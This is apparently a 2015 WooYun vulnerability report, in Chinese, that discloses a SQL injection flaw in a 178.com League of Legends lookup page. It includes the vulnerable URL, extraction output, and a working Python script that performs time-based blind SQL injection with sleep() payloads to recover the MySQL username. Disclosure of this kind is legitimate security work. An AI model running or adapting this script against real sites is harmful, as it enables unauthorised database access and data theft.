漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-094869
漏洞标题:178游戏网某分站SQL注入一枚
相关厂商:178游戏网
漏洞作者: 吃虾小能手
提交时间:2015-02-02 09:51
修复时间:2015-02-07 09:52
公开时间:2015-02-07 09:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-07: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
http://lolnewbf.178.com/person/index?server=卡拉曼达&name=262120442222
漏洞证明:
[in progress] lolbf_user@192.168.20
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
[in progress] lolbf_user@192.168.20.
. . . . . . . . . . . . . . . . . . . . . . . . . . . .
[in progress] lolbf_user@192.168.20.2
. . . . . . . . . . . . . . . . . . . . . . . . . . . .
[in progress] lolbf_user@192.168.20.22
. . . . . . . . . . . . . . . . . . . . . . . . . . . .
[in progress] lolbf_user@192.168.20.222
李姐姐的脚本:
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
payloads.append(str(i))
payloads += ['@','_', '.']
print 'start to retrive MySQL user:'
user = ''
for i in range(0, 40):
for payload in payloads:
conn = httplib.HTTPConnection('lolnewbf.178.com', timeout=60)
s = '262120442222\' and ' \
'sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) ' \
'AND \'TpeR\'=\'TpeR' % (i, ord(payload))
conn.request(method='GET',
url='/person/index?server=卡拉曼达&name='+urllib.quote(s),
headers=headers)
start_time = time.time()
conn.getresponse().read().decode('utf-8')
if time.time() - start_time > 1.0:
user += payload
print '\n[in progress]', user
break
else:
print '.',
print '\nMySQL user is', user
修复方案:
版权声明:转载请注明来源 吃虾小能手@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-02-07 09:52
厂商回复:
最新状态:
2015-02-08:@吃虾小能手 非常抱歉,没及时确认。感谢您的指教。